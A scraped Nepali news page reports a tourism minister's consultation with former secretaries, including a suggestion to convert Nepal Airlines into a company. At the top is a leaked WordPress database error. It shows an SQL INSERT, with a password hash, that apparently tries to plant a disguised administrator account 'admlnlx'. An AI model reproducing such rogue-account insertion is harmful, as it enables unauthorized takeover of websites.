WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmsLkAfgPesDugmVinRcxhJsRamOOU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 04:20:35', '', 'admlnlx', 'admlnlx')

पर्यटनमन्त्रीले लिए पूर्वसचिवसँग सुझाव – Gaule Khabar

पर्यटनमन्त्रीले लिए पूर्वसचिवसँग सुझाव

पर्यटनमन्त्रीले लिए पूर्वसचिवसँग सुझाव

मन्त्रालय र मातहत निकायको कामलाई प्रभावकारी बनाउने उद्देश्यले संस्कृति, पर्यटन तथा नागरिक उड्डयनमन्त्री सुदन किरातीले पूर्वसचिवहरुसँग छलफल गरेका छन । मन्त्रालयमा आज भएको छलफलमा किरातिले पर्यटन एवं हवाई क्षेत्रको विकास एवं सम्वद्र्धनका विषयमा पूर्वसचिवहरूको रायसुझाव लिए ।

बैठकमा पूर्वसचिवहरूको आफ्नो कार्यकालमा बाँकी रहेका अधुरा अविनाशी छाप र अनुभव, बाँकी रहेका अधुरा सपना, वतर्मान हाम्रो स्थिति र भावी दिनमा हामी के गर्न सक्छौँ भन्ने एजेन्डामा छलफल भएको पर्यटनमन्त्रीको निजी सचिवालयले जनाएको छ ।

बैठकमा पूर्व मुख्यसचिव लीलामणि पौडेल, शङ्करप्रसाद अधिकारी, मोहनकृण श्रेष्ठ, महेश्वर नेउपाने लगायतका पूर्वसचिवहरूले आफ्नो अनुभव र सुझाव राख्नुभएको थियो । अधिकांश सचिवहरूले नेपाल वायुसेवा निगमलाई कम्पनीमा रुपान्तरण गर्नुपर्ने लगायतका सुझाव राख्नुभएको थियो । आगामी दिनमा पनि फेरि बैठक बसेर उहाँहरूको अनुभव सुन्ने मन्त्री किरातीले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका